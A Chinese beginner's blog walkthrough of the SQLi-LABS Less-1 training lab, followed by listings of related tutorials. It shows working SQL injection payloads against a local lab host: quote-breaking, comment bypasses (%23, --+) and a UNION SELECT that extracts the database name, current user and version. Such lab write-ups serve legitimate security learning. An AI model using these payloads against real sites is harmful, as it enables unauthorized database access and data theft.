SQLi-LABS less-1

最新推荐文章于 2024-04-17 21:32:10 发布
最新推荐文章于 2024-04-17 21:32:10 发布
阅读量151 收藏 1
点赞数
分类专栏: 网络安全 文章标签: sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37529822/article/details/117389137
版权

SQLi-LABS less-1通关总结(纯小白向)

先来看看题目

主要是了解单引号在sql注入中的用法主要是了解单引号在sql注入中的用法。

在这里插入图片描述请输入数字参数作为ID的值。

开始尝试测试

在hackbar中输入:
http://192.168.58.131:86/Less-1/?id=1
在这里插入图片描述更改id的值分别获得不同的name和passwd,当id值为15时,显示为空,说明表中的数据只有14列。

尝试输入单引号

在hackbar中输入:
http://192.168.58.131:86/Less-1/?id=1’
在这里插入图片描述网页显示出现语法错误,问题出现在:
‘1’’ LIMIT 0,1
那么可以猜测sql中的语法大概是:
select * from [DATABASE] where id=‘输入值’ LIMIT 0,1
输入值即为?id=之后的字符串。
如果想使用单引号而又不出现上述问题,只能对其注释。
mysql中的注释主要可以分为三种:

  • #:注释从“#”字符到行尾;
  • --:注释从“–”序列到行尾,使用时后面需要加上“+”,如“--+”
  • /* */:注释从/*序列到后面的*/序列中间的字符。
    可用在此处的注释只有前两种。
  1. 首先使用#注释:
    http://192.168.58.131:86/Less-1/?id=1’ #
    在这里插入图片描述这里显示#没有作用,网址上显示为:
    http://192.168.58.131:86/Less-1/?id=1%27%20#

#没有被解释为十六进制数字,查看其ASCII码为35,十六进制%23,更改后输入,在这里插入图片描述这里证明’ LIMIT 0,1已被注释。
2. 使用“--+”注释
http://192.168.58.131:86/Less-1/?id=1’ --+
在这里插入图片描述

尝试获取数据库名称

http://192.168.58.131:86/Less-1/?id=-1’ union select 1,2,3 --+
这里输入id值为-1,可以让数据库查询值为空,从而执行后面的联合查询 select 1,2,3用联合查询的值代替id查询的值,至于为什么是1,2,3,可以自己尝试当输入为1或者1,2时均会返回参数错误,也是重复尝试出来的。
在这里插入图片描述判断出参数后就可以使用其他函数查询出数据库相关内容:

http://192.168.58.131:86/Less-1/?id=-1’ union select 2,3,concat(database(),',',current_user(),',',','version()) --+
在这里插入图片描述concat()或者concat_ws()函数都可,均为可以一次查询多个数据。

第一次学习大概就这些了,主要是了解了基本sql语法、单引号使用和查询函数。

威力张
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-1~4(sqli-labs闯关指南 1—4)
m0_54899775的博客
12-14 1186
sqli-labs Less-1 sqli-labs Less-2 sqli-labs Less-3 sqli-labs Less-4 sqli-labs Less-1~4(sqli-labs闯关指南 1—4) sqlilab注入天书1-4 sql注入
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1511
Sqli-labs靶场详细攻略
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2785
sqli-labs靶场之前建议补一下基础。
sqli-labs-master(Less1--Less5)
2301_81105268的博客
04-17 1125
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。from information_schema.tables即table_name的内容在这个数据库里的tables表里查询,并且有个条件是table_name这个表所属的数据库是security。由此可判断闭合为:')输入3显示正常,输入4报错,则判断数据库中的字段数为3。
sqli-labs通关攻略教程一(less 01~less 02)
m0_55854679的博客
06-12 344
数据库知识整理 MYSQL基本用法 查库 show databases; ##方法1 select schema_name from information_schema.schemata; ##方法2 2. 查表 use security; ##方法1 show tables; select table_name from information_schema.tables where table_schema='security' ##方法2 3. 查列 se
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1927
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 568
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1284
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
SQL注入之sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 4652
SQL注入之sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
sqli-labs (less1-less4)
Xi4or0uji
07-24 1715
就只是随便记一记 less 1 get方法的引号闭合 id=1'有报错,证明有注入点,然后接下来是看一下有多少列 ?id=-1' union select 1,2,3--+' 这里我们如果只是写select后面加三个以下数字都会报错,证明里面是有三列的,用order by 也可以查出来 剩下的就是爆数据库,表,字段,值了 爆数据库 ?id=-1' union select 1,gr...
SQL注入之sqli-labs-master Less-1详解
luoshiyong123的博客
03-28 1535
1.读题 一开始是这个界面,提示输入id,这里能够输入的地方只有http请求里边,所以输入: http://localhost./sqll/sqli-labs-master/Less-1/?id=1试一下,?id=1是httpget方法的格式。然后: 得到密码,当把id换成2,3,4都可以得到对应password。但是要实现查询各种信息还不行。接下来找注入点 2.找注入点 id=...
Sqli-labs Less-1
Jiajiajiang_的博客
11-02 298
基于错误的SQL注入 Less-1 Less-1 基于错误的单引号注入 1、测试漏洞是否存在 1)id=1时,正常执行 http://127.0.0.1/sqlilabs/Less-1/?id=1 2)id=1'时,报错,说明可能存在SQL注入 http://127.0.0.1/sqlilabs/Less-1/?id=1' 从上述错误当中,我们可以看到提交到SQL语句...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值